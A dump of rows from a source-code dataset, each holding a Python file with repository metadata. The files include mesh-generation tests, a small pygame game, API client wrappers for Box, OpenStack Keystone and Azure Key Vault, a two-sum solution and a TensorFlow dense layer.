[1, 1000, 1800, [0, 0, 0], [1418750 / 27.0, 1418750 / 27.0, 137500 / 27.0]],
[2, 1000, 1800, [0, 0, 0], [484375 / 9.0, 1384375 / 27.0, 137500 / 27.0]],
],
)
def test_moebius3(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(num_twists, 100, 10, mode="classical")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
def test_pseudomoebius():
points, cells = meshzoo.moebius(nl=190, nw=31, mode="pseudo")
assert len(points) == 5890
assert len(cells) == 11400
assert _near_equal(numpy.sum(points, axis=0), [0, 0, 0], tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
ref2 = [2753575 / 9.0, 2724125 / 9.0, 58900 / 3.0]
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
def test_rectangle():
points, cells = meshzoo.rectangle(nx=11, ny=11, zigzag=False)
assert len(points) == 121
assert _near_equal(numpy.sum(points, axis=0), [60.5, 60.5, 0.0])
assert len(cells) == 200
points, cells = meshzoo.rectangle(nx=11, ny=11, zigzag=True)
assert len(points) == 121
assert _near_equal(numpy.sum(points, axis=0), [60.5, 60.5, 0.0])
assert len(cells) == 200
points, cells = meshzoo.rectangle(nx=2, ny=2, zigzag=True)
assert len(points) == 4
assert _near_equal(numpy.sum(points, axis=0), [2.0, 2.0, 0.0])
assert len(cells) == 2
points, cells = meshzoo.rectangle(nx=3, ny=2, zigzag=False)
assert len(points) == 6
assert _near_equal(numpy.sum(points, axis=0), [3.0, 3.0, 0.0])
assert len(cells) == 4
assert set(cells[0]) == set([0, 1, 4])
assert set(cells[2]) == set([0, 3, 4])
points, cells = meshzoo.rectangle(nx=3, ny=2, zigzag=True)
assert len(points) == 6
assert _near_equal(numpy.sum(points, axis=0), [3.0, 3.0, 0.0])
assert len(cells) == 4
assert set(cells[0]) == set([0, 1, 4])
assert set(cells[2]) == set([0, 3, 4])
def test_simple_arrow():
points, cells = meshzoo.simple_arrow()
assert len(points) == 5
assert _near_equal(numpy.sum(points, axis=0), [7.0, 0.0, 0.0])
assert len(cells) == 4
def test_simple_shell():
points, cells = meshzoo.simple_shell()
assert len(points) == 5
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 1.0])
assert len(cells) == 4
def test_triangle():
points, cells = meshzoo.triangle(4)
assert len(points) == 15
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 16
def test_tube():
points, cells = meshzoo.tube(n=10)
assert len(points) == 20
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 20
def test_plot2d():
points, cells = meshzoo.triangle(4)
meshzoo.show2d(points, cells)
# def test_ball():
# points, cells = meshzoo.meshpy.ball.create_ball_mesh(10)
# assert len(points) == 1360
# assert len(cells) == 5005
#
#
# def test_cube():
# points, cells = meshzoo.meshpy.cube.create_mesh(10)
# assert len(points) == 50
# assert len(cells) == 68
#
#
# def test_ellipse():
# points, cells = meshzoo.meshpy.ellipse.create_mesh(0.5, 1, 100)
# assert len(points) == 1444
# assert len(cells) == 2774
#
#
# def test_lshape():
# points, cells = meshzoo.meshpy.lshape.create_mesh()
# assert len(points) == 38
# assert len(cells) == 58
#
#
# def test_lshape3d():
# points, cells = meshzoo.meshpy.lshape3d.create_mesh()
# assert len(points) == 943
# assert len(cells) == 3394
#
#
# def test_pacman():
# points, cells = meshzoo.meshpy.pacman.create_pacman_mesh()
# assert len(points) == 446
# assert len(cells) == 831
#
#
# def test_rectangle():
# points, cells = meshzoo.meshpy.rectangle.create_mesh()
# assert len(points) == 88
# assert len(cells) == 150
#
#
# def test_rectangle_with_hole():
# points, cells = meshzoo.meshpy.rectangle_with_hole.create_mesh()
# assert len(points) == 570
# assert len(cells) == 964
#
#
# def test_tetrahedron():
# points, cells = meshzoo.meshpy.tetrahedron.create_tetrahedron_mesh()
# assert len(points) == 604
# assert len(cells) == 1805
#
#
# def test_torus():
# points, cells = meshzoo.meshpy.torus.create_mesh()
# assert len(points) == 921
# assert len(cells) == 2681
# Disable for now since Gmsh doesn't pass for the version installed on travis
# (trusty).
# def test_screw():
# points, cells = meshzoo.pygmsh.screw.create_screw_mesh()
# assert len(points) == 2412
# assert len(cells) == 7934
# Disable for now since we need mshr in a dev version for mshr.Extrude2D
# def test_toy():
# points, cells = meshzoo.mshr.toy.create_toy_mesh()
# assert len(points) == 2760
# assert len(cells) == 11779
# if __name__ == '__main__':
# test_plot2d()
# # import meshio
# # points_, cells_ = meshzoo.triangle(7)
# # meshio.write('triangle.vtu', points_, {'triangle': cells_})
# # points_, cells_ = meshzoo.cube()
# # meshio.write('cube.vtu', points_, {'tetra': cells_})
def test_edges():
_, cells = meshzoo.triangle(2)
edges_nodes, edges_cells = meshzoo.create_edges(cells)
assert numpy.all(
edges_nodes
== [[0, 1], [0, 3], [1, 2], [1, 3], [1, 4], [2, 4], [3, 4], [3, 5], [4, 5]]
)
assert numpy.all(edges_cells == [[3, 1, 0], [5, 4, 2], [6, 3, 4], [8, 7, 6]])
| [
"[email protected]"
] | |
586fbbda387bcc0fd0af65aec9272afaf55c6d94 | db3a0578ef5d79cee7f9e96fa3fd291bbaaf9eb4 | /Pygame/Bees/bees.py | 90620d058d1920a15e8892180aa8c230a8c0d55f | [
"MIT"
] | permissive | otisgbangba/python-lessons | 0477a766cda6bc0e2671e4cce2f95bc62c8d3c43 | a29f5383b56b21e6b0bc21aa9acaec40ed4df3cc | refs/heads/master | 2022-11-03T22:10:52.845204 | 2020-06-13T15:42:40 | 2020-06-13T15:42:40 | 261,255,751 | 1 | 0 | MIT | 2020-05-04T17:48:12 | 2020-05-04T17:48:11 | null | UTF-8 | Python | false | false | 1,885 | py | import pygame, random
from pygame.locals import *
from util import loadImage
from bee import Bee
from flower import Flower
from score import Score
pygame.init()
TITLE = 'Bee, Get the Nectar!'
screen = pygame.display.set_mode((1280, 720), 0)
screenRect = screen.get_rect()
Bee.loadImages()
Flower.loadImages()
background = loadImage('clover-large.jpg')
font = pygame.font.Font(None, 48)
text = font.render(TITLE, 1, Color('white'))
textpos = text.get_rect(centerx=screenRect.width/2, centery=25)
background.blit(text, textpos)
screen.blit(background, (0, 0))
pygame.display.flip()
bee = Bee(screenRect)
flowers = pygame.sprite.Group()
score = Score()
drawingGroup = pygame.sprite.RenderUpdates()
drawingGroup.add(bee)
drawingGroup.add(score)
pygame.display.set_caption(TITLE)
pygame.mouse.set_visible(0)
clock = pygame.time.Clock()
angles = (( 45, 0, -45),
( 90, 0, -90),
(135, 180, -135))
# game loop
loop = True
while loop:
# get input
for event in pygame.event.get():
if event.type == QUIT \
or (event.type == KEYDOWN and event.key == K_ESCAPE):
loop = False
keystate = pygame.key.get_pressed()
xdir = keystate[K_RIGHT] - keystate[K_LEFT] # -1, 0, or 1
ydir = keystate[K_DOWN] - keystate[K_UP]
bee.setAngle(angles[ydir+1][xdir+1])
bee.rect = bee.rect.move((xdir * 8, ydir * 8)).clamp(screenRect)
# Detect collisions
for flower in pygame.sprite.spritecollide(bee, flowers, True):
score.score += 1
flower.kill()
if random.randint(0, 50) == 0:
flower = Flower(screenRect)
drawingGroup.add(flower)
flowers.add(flower)
drawingGroup.clear(screen, background)
drawingGroup.update()
changedRects = drawingGroup.draw(screen)
pygame.display.update(changedRects)
# maintain frame rate
clock.tick(40)
pygame.quit()
| [
"[email protected]"
] | |
fc5c6cf54acdc92357aedf5a77af4161c7885cb0 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Box/Users/DeleteUser.py | 19db5a19eb485a39cf7171ed247400616e188e0a | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,041 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# DeleteUser
# Deletes a specified user.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class DeleteUser(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the DeleteUser Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Box/Users/DeleteUser')
def new_input_set(self):
return DeleteUserInputSet()
def _make_result_set(self, result, path):
return DeleteUserResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return DeleteUserChoreographyExecution(session, exec_id, path)
class DeleteUserInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the DeleteUser
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved during the OAuth2 process.)
"""
InputSet._set_input(self, 'AccessToken', value)
def set_Force(self, value):
"""
Set the value of the Force input for this Choreo. ((optional, boolean) Whether or not the user should be deleted even when they still own files.)
"""
InputSet._set_input(self, 'Force', value)
def set_Notify(self, value):
"""
Set the value of the Notify input for this Choreo. ((optional, boolean) Indicates that the user should receive an email notification of the transfer.)
"""
InputSet._set_input(self, 'Notify', value)
def set_UserID(self, value):
"""
Set the value of the UserID input for this Choreo. ((required, string) The id of the user whose information should be updated.)
"""
InputSet._set_input(self, 'UserID', value)
class DeleteUserResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the DeleteUser Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Box.)
"""
return self._output.get('Response', None)
class DeleteUserChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return DeleteUserResultSet(response, path)
| [
"[email protected]"
] | |
b4fdf0086dda0bb0a9e8e631adbd62959995d35f | be01d0d54723d1e876c9a15618921dffe2b2255a | /Python/BinarySearch/two_sumII.py | 0d534e7163571ad8332aad8f4b807b4999e276c6 | [] | no_license | jxlxt/leetcode | 17e7f25bf94dd334ac0d6254ffcffa003ed04c10 | a6e6e5be3dd5f9501d0aa4caa6744621ab887f51 | refs/heads/master | 2023-05-26T22:10:03.997428 | 2023-05-24T02:36:05 | 2023-05-24T02:36:05 | 118,216,055 | 0 | 0 | null | 2018-01-20T06:31:57 | 2018-01-20T06:30:06 | null | UTF-8 | Python | false | false | 1,122 | py | #! /Users/xiaotongli/anaconda3/bin/python
# -*- coding: utf-8 -*-
# @Time : 9/28/18 10:57 PM
# @Author : Xiaotong Li
# @School : University of California, Santa Cruz
# @FileName: autocomplete_System.py
# @Software: PyCharm
class Solution:
def twoSum(self, numbers, target):
"""
:type numbers: List[int]
:type target: int
:rtype: List[int]
"""
# the first method is dictinoary method
dict = {}
# enumerate() get the index and value of array
for i, num in enumerate(numbers):
if target - num in dict:
return [dict[target-num]+1, i+1]
dict[num] = i
# binary search method
for i in range(len(numbers)):
left, right = i+1, len(numbers) - 1
res = target - numbers[i]
while left <= right:
mid = left + (right - left) // 2
if numbers[mid] == res:
return [i+1, mid+1]
elif numbers[mid] < res:
left = mid + 1
else:
right = mid - 1
| [
"[email protected]"
] | |
bbc97a0c69bc5c0d0fd4008b39d904edef1921b0 | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/periodicities/Month/Cycle_Month_25_M_360.py | 82ea2d119aaaddab2bb5d8c525d24df36e2a36a3 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 82 | py | import tests.periodicities.period_test as per
per.buildModel((360 , 'M' , 25));
| [
"[email protected]"
] | |
5bc08a32ba5bc9e78823dc89fe5070e1deb89e25 | 057d2d1e2a78fc89851154e87b0b229e1e1f003b | /venv/Lib/site-packages/keystoneclient/auth/identity/v2.py | add1da4f5d894be3192f1253735eca8da6d07f56 | [
"Apache-2.0"
] | permissive | prasoon-uta/IBM-Cloud-Secure-File-Storage | 276dcbd143bd50b71121a73bc01c8e04fe3f76b0 | 82a6876316715efbd0b492d0d467dde0ab26a56b | refs/heads/master | 2022-12-13T00:03:31.363281 | 2018-02-22T02:24:11 | 2018-02-22T02:24:11 | 122,420,622 | 0 | 2 | Apache-2.0 | 2022-12-08T05:15:19 | 2018-02-22T02:26:48 | Python | UTF-8 | Python | false | false | 7,824 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import logging
from oslo_config import cfg
import six
from keystoneclient import access
from keystoneclient.auth.identity import base
from keystoneclient import exceptions
from keystoneclient import utils
_logger = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class Auth(base.BaseIdentityPlugin):
"""Identity V2 Authentication Plugin.
:param string auth_url: Identity service endpoint for authorization.
:param string trust_id: Trust ID for trust scoping.
:param string tenant_id: Tenant ID for project scoping.
:param string tenant_name: Tenant name for project scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
"""
@classmethod
def get_options(cls):
options = super(Auth, cls).get_options()
options.extend([
cfg.StrOpt('tenant-id', help='Tenant ID'),
cfg.StrOpt('tenant-name', help='Tenant Name'),
cfg.StrOpt('trust-id', help='Trust ID'),
])
return options
def __init__(self, auth_url,
trust_id=None,
tenant_id=None,
tenant_name=None,
reauthenticate=True):
super(Auth, self).__init__(auth_url=auth_url,
reauthenticate=reauthenticate)
self._trust_id = trust_id
self.tenant_id = tenant_id
self.tenant_name = tenant_name
@property
def trust_id(self):
# Override to remove deprecation.
return self._trust_id
@trust_id.setter
def trust_id(self, value):
# Override to remove deprecation.
self._trust_id = value
def get_auth_ref(self, session, **kwargs):
headers = {'Accept': 'application/json'}
url = self.auth_url.rstrip('/') + '/tokens'
params = {'auth': self.get_auth_data(headers)}
if self.tenant_id:
params['auth']['tenantId'] = self.tenant_id
elif self.tenant_name:
params['auth']['tenantName'] = self.tenant_name
if self.trust_id:
params['auth']['trust_id'] = self.trust_id
_logger.debug('Making authentication request to %s', url)
resp = session.post(url, json=params, headers=headers,
authenticated=False, log=False)
try:
resp_data = resp.json()['access']
except (KeyError, ValueError):
raise exceptions.InvalidResponse(response=resp)
return access.AccessInfoV2(**resp_data)
@abc.abstractmethod
def get_auth_data(self, headers=None):
"""Return the authentication section of an auth plugin.
:param dict headers: The headers that will be sent with the auth
request if a plugin needs to add to them.
:return: A dict of authentication data for the auth type.
:rtype: dict
"""
pass # pragma: no cover
_NOT_PASSED = object()
class Password(Auth):
"""A plugin for authenticating with a username and password.
A username or user_id must be provided.
:param string auth_url: Identity service endpoint for authorization.
:param string username: Username for authentication.
:param string password: Password for authentication.
:param string user_id: User ID for authentication.
:param string trust_id: Trust ID for trust scoping.
:param string tenant_id: Tenant ID for tenant scoping.
:param string tenant_name: Tenant name for tenant scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
:raises TypeError: if a user_id or username is not provided.
"""
def __init__(self, auth_url, username=_NOT_PASSED, password=None,
user_id=_NOT_PASSED, **kwargs):
super(Password, self).__init__(auth_url, **kwargs)
if username is _NOT_PASSED and user_id is _NOT_PASSED:
msg = 'You need to specify either a username or user_id'
raise TypeError(msg)
if username is _NOT_PASSED:
username = None
if user_id is _NOT_PASSED:
user_id = None
self.user_id = user_id
self._username = username
self._password = password
@property
def username(self):
# Override to remove deprecation.
return self._username
@username.setter
def username(self, value):
# Override to remove deprecation.
self._username = value
@property
def password(self):
# Override to remove deprecation.
return self._password
@password.setter
def password(self, value):
# Override to remove deprecation.
self._password = value
def get_auth_data(self, headers=None):
auth = {'password': self.password}
if self.username:
auth['username'] = self.username
elif self.user_id:
auth['userId'] = self.user_id
return {'passwordCredentials': auth}
@classmethod
def load_from_argparse_arguments(cls, namespace, **kwargs):
if not (kwargs.get('password') or namespace.os_password):
kwargs['password'] = utils.prompt_user_password()
return super(Password, cls).load_from_argparse_arguments(namespace,
**kwargs)
@classmethod
def get_options(cls):
options = super(Password, cls).get_options()
options.extend([
cfg.StrOpt('username',
dest='username',
deprecated_name='user-name',
help='Username to login with'),
cfg.StrOpt('user-id', help='User ID to login with'),
cfg.StrOpt('password', secret=True, help='Password to use'),
])
return options
class Token(Auth):
"""A plugin for authenticating with an existing token.
:param string auth_url: Identity service endpoint for authorization.
:param string token: Existing token for authentication.
:param string tenant_id: Tenant ID for tenant scoping.
:param string tenant_name: Tenant name for tenant scoping.
:param string trust_id: Trust ID for trust scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
"""
def __init__(self, auth_url, token, **kwargs):
super(Token, self).__init__(auth_url, **kwargs)
self._token = token
@property
def token(self):
# Override to remove deprecation.
return self._token
@token.setter
def token(self, value):
# Override to remove deprecation.
self._token = value
def get_auth_data(self, headers=None):
if headers is not None:
headers['X-Auth-Token'] = self.token
return {'token': {'id': self.token}}
@classmethod
def get_options(cls):
options = super(Token, cls).get_options()
options.extend([
cfg.StrOpt('token', secret=True, help='Token'),
])
return options
| [
"[email protected]"
] | |
319a8ecd8143da437cd5720b73ed24a1a396c1cc | 2f09e893c3a21f4a17c95b99446d1efbf0b109f7 | /huaytools/tensorflow/layers/__init__.py | 6f45582415c893a8cb74a1d2dd931b0b6805be10 | [
"MIT"
] | permissive | knight134/huaytools | b19f0078e724963415c63d60218ae3cc624f598a | cbecd6771c05f8241e756a7619047589397b16d3 | refs/heads/master | 2020-04-24T18:30:27.732740 | 2018-05-27T13:51:24 | 2018-05-27T13:51:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,595 | py | """
"""
import tensorflow as tf
import tensorlayer as tl
# from .cnn import *
# from .rnn import *
from .attention import *
from .embedding import *
logging = tf.logging
def dense(inputs, n_units,
activation=tf.nn.relu,
use_bias=True,
W_init=tf.truncated_normal_initializer(stddev=0.1),
W_init_args=None,
b_init=tf.constant_initializer(value=0.0),
b_init_args=None,
name="dense",
reuse=None):
"""全连接层
input_shape: [batch_size, n_features]
output_shape: [batch_size, n_units]
References:
tf.layers.Dense
tl.layers.DenseLayer
"""
W_init_args = {} if W_init_args is None else W_init_args
b_init_args = {} if b_init_args is None else b_init_args
logging.info("DenseLayer: %s - n_units: %d activation: %s" % (name, n_units, activation.__name__))
# n_inputs = int(tf.convert_to_tensor(inputs).get_shape()[-1])
inputs = tf.convert_to_tensor(inputs)
n_inputs = inputs.get_shape()[-1].value
with tf.variable_scope(name, reuse=reuse):
W = tf.get_variable('W', shape=[n_inputs, n_units], initializer=W_init, dtype=tf.float32,
**W_init_args)
if use_bias:
b = tf.get_variable('b', shape=[n_units], initializer=b_init, dtype=tf.float32,
**b_init_args)
# outputs = act(tf.matmul(inputs, W) + b)
outputs = activation(tf.nn.xw_plus_b(inputs, W, b))
else:
outputs = activation(tf.matmul(inputs, W))
return outputs
| [
"[email protected]"
] | |
1548d5d2f9a1f0420dc18688bb58d6d32b25877a | bad62c2b0dfad33197db55b44efeec0bab405634 | /sdk/keyvault/azure-mgmt-keyvault/azure/mgmt/keyvault/v2021_10_01/operations/_mhsm_private_endpoint_connections_operations.py | 071dc770d7741dd509f07515c1cb63522e1d153e | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | test-repo-billy/azure-sdk-for-python | 20c5a2486456e02456de17515704cb064ff19833 | cece86a8548cb5f575e5419864d631673be0a244 | refs/heads/master | 2022-10-25T02:28:39.022559 | 2022-10-18T06:05:46 | 2022-10-18T06:05:46 | 182,325,031 | 0 | 0 | MIT | 2019-07-25T22:28:52 | 2019-04-19T20:59:15 | Python | UTF-8 | Python | false | false | 26,266 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar, Union, cast
from msrest import Serializer
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_by_resource_request(
subscription_id: str,
resource_group_name: str,
name: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections") # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"name": _SERIALIZER.url("name", name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_request(
subscription_id: str,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}") # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"name": _SERIALIZER.url("name", name, 'str'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_put_request(
subscription_id: str,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
*,
json: Optional[_models.MHSMPrivateEndpointConnection] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}") # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"name": _SERIALIZER.url("name", name, 'str'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_delete_request_initial(
subscription_id: str,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}") # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"name": _SERIALIZER.url("name", name, 'str'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
class MHSMPrivateEndpointConnectionsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.keyvault.v2021_10_01.KeyVaultManagementClient`'s
:attr:`mhsm_private_endpoint_connections` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list_by_resource(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.MHSMPrivateEndpointConnectionsListResult]:
"""The List operation gets information about the private endpoint connections associated with the
managed HSM Pool.
:param resource_group_name: Name of the resource group that contains the managed HSM pool.
:type resource_group_name: str
:param name: Name of the managed HSM Pool.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MHSMPrivateEndpointConnectionsListResult or the
result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnectionsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.MHSMPrivateEndpointConnectionsListResult]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
name=name,
api_version=api_version,
template_url=self.list_by_resource.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_by_resource_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
name=name,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("MHSMPrivateEndpointConnectionsListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ManagedHsmError, pipeline_response)
